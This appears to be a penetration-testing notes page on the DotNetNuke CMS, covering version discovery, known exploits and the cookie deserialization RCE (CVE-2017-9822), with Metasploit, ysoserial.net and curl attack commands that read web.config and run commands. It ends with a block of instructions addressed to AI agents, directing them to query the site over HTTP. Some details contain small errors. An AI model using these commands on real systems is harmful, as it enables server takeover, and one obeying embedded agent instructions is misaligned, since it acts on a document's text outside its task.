# DotNetNuke `DNN` (formerly `DotNetNuke`) is an open-source `Content Management System (CMS)`, written in `C#` and based on the `.NET` framework. A number of core features can be expended through a large panel of third-party (or in-house) apps and modules to extend the `CMS` basic functionalities. ### Identification and discovery **Version disclosure** The `/Documentation/License.txt` file, if present, may hold information about the release year of the `DotNetNuke` version being used by the webserver. ``` DotNetNuke - http://www.dotnetnuke.com Copyright (c) 2002-2017 by DotNetNuke Corporation [...] ``` **Robots.txt** By default, `DotNetNuke` installation configure a verbose `robots.txt` entry, listing a number of built-in locations. ``` Disallow: /admin/ Disallow: /App_Browsers/ Disallow: /App_Code/ Disallow: /App_Data/ Disallow: /App_GlobalResources/ Disallow: /bin/ Disallow: /Components/ Disallow: /Config/ Disallow: /contest/ Disallow: /controls/ Disallow: /DesktopModules/ Disallow: /Documentation/ Disallow: /HttpModules/ Disallow: /images/ Disallow: /Install/ Disallow: /js/ Disallow: /Portals/ Disallow: /Providers/ Disallow: /Resources/ContentRotator/ Disallow: /Resources/ControlPanel/ Disallow: /Resources/Dashboard/ Disallow: /Resources/FeedBrowser/ Disallow: /Resources/OpenForceAd/ Disallow: /Resources/Search/ Disallow: /Resources/Shared/ Disallow: /Resources/SkinWidgets/ Disallow: /Resources/TabStrip/ Disallow: /Resources/Widgets/ Disallow: /Activity-Feed/userId/ # Do not index user profiles ``` ### Known vulnerabilities **ExploitDB exploits (as of 2021-08-08)** ``` searchsploit DotNetNuke DotNetNuke - Arbitrary File Upload | asp/webapps/12700.txt DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit) | windows/remote/48336.rb DotNetNuke 07.04.00 - Administration Authentication Bypass | asp/webapps/39777.txt DotNetNuke 4.0 - HTML Injection | asp/webapps/28615.txt DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption | windows/remote/31465.cs DotNetNuke 4.8.3 - 'Default.aspx' Cross-Site Scripting | asp/webapps/31865.txt DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting | asp/webapps/33009.txt DotNetNuke 5.5.1 - 'InstallWizard.aspx' Cross-Site Scripting | asp/webapps/35045.txt DotNetNuke 6.1.x - Cross-Site Scripting | asp/webapps/38696.txt DotNetNuke 9.3.2 - Cross-Site Scripting | multiple/webapps/47449.txt DotNetNuke 9.5 - File Upload Restrictions Bypass | aspx/webapps/48125.txt DotNetNuke 9.5 - Persistent Cross-Site Scripting | aspx/webapps/48124.txt DotNetNuke < 9.4.0 - Cross-Site Scripting | multiple/webapps/47448.py DotNetNuke DNNArticle Module 10.0 - SQL Injection | php/webapps/27602.txt DotNetNuke DNNarticle Module 11 - Directory Traversal | windows/webapps/44414.txt DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit) | windows/webapps/35039.rb DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit) | aspx/webapps/43405.rb SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE) | windows/webapps/17873.txt ``` **Cookie Deserialization Remote Code Execution (CVE-2017-9822)** A deserialization vulnerability is present in the `DotNetNuke (DNN)` CMS, versions `5.0.0` to `9.3.0-RC`, which can be leveraged to remotely execute code on the underlying system without authentication. The vulnerability lies in the deserialization of the `DNNPersonalization` cookie (`XML` format), used to store (authenticated or unauthenticated) user's preferences. This cookie is notably processed during handling of `404` errors if the built-in default `DNN`'s missing page is used. While the object `type` to deserialize is user-controlled in the `DNNPersonalization` cookie, the `XmlSerializer` class (used by `CNN` for the processing) cannot be used to serialize / deserialize types with interface members. As stated in the [original research paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf), the `ObjectDataProvider` class can be used in combination with one of the following methods: * `XamlReader.Load(String)`, leading to remote code execution. * `ObjectStateFormatter.Deserialize(String)`, leading to remote code execution. * `DotNetNuke.Common.Utilities.FileSystemUtils.PullFile(String)`, for arbitrary file write (for example to upload a `webshell` if a writable path can be found). * `DotNetNuke.Common.Utilities.FileSystemUtils.WriteFile(String)`, for arbitrary file read. Note that the usable types may be limited to `DotNetNuke.*` classes (and thus to arbitrary file read / write). The initial vulnerability is identified by `CVE-2017-9822`, with a number of bypass of the attempts at fixing the initial bug identified as `CVE-2018-15811`, `CVE-2018-15812`, `CVE-2018-15825`, and `CVE-2018-15826`. The following `DotNetNuke` versions are vulnerable: * `5.0.0 to 9.1.0` ([CVE-2017-9822](https://www.cvedetails.com/cve/CVE-2017-9822/)) * `9.1.1` ([CVE-2018-15811](https://www.cvedetails.com/cve/CVE-2018-15811/)) * `9.2 to 9.2.1` ([CVE-2018-15811](https://www.cvedetails.com/cve/CVE-2018-15811/)) * `9.2.2 to 9.3.0-RC` ([CVE-2018-15825](https://www.cvedetails.com/cve/CVE-2018-18325) and [CVE-2018-15825](https://www.cvedetails.com/cve/CVE-2018-18325)) **Metasploit module (for pre and post CVE-2017-9822 patching exploit)** The `Metasploit`'s `exploit/windows/http/dnn_cookie_deserialization_rce` module can be used to exploit the deserialization remote code execution vulnerability, prior to the initial patching `CVE-2017-9822` and using the subsequent bypass. The "[How to exploit the DotNetNuke Cookie Deserialization](https://pentest-tools.com/blog/exploit-dotnetnuke-cookie-deserialization/)" blog post can be consulted for information on how to exploit the vulnerability using `metasploit` depending on the targeted version. ``` msf > use exploit/windows/http/dnn_cookie_deserialization_rce ``` **Pre-patching exploitation (CVE-2017-9822) using ysoserial** `ysoserial.net` can be used to generate `DotNetNuke` cookies that will result in the execution of the specified command or arbitrary read / write of the given file against `DotNetNuke` version `5.0.0 to 9.1.0`. ``` ysoserial.exe -p DotNetNuke -m run_command -c "" ysoserial.exe -p DotNetNuke -m read_file -f "" ysoserial.exe -p DotNetNuke -m write_file -u "" -f "" # Retrieves the "web.config" configuration file (in its default location) in order to identify the webserver hosted directories for the upload o a webshell. .\ysoserial.exe -p DotNetNuke -m read_file -f C:\DotNetNuke\web.config WriteFileC:\DotNetNuke\web.config ``` The generated serialized cookie can then be sent to a non-existing page using, for example, the `curl` utility: ``` curl -i -s -k -X 'GET' \ -b '.DOTNETNUKE=;DNNPersonalization=' \ 'http:///pagedoesnotexist123456789abc' ``` *** ### References --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.qazeer.io/web-applications/cms_and_softwares/dotnetnuke.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.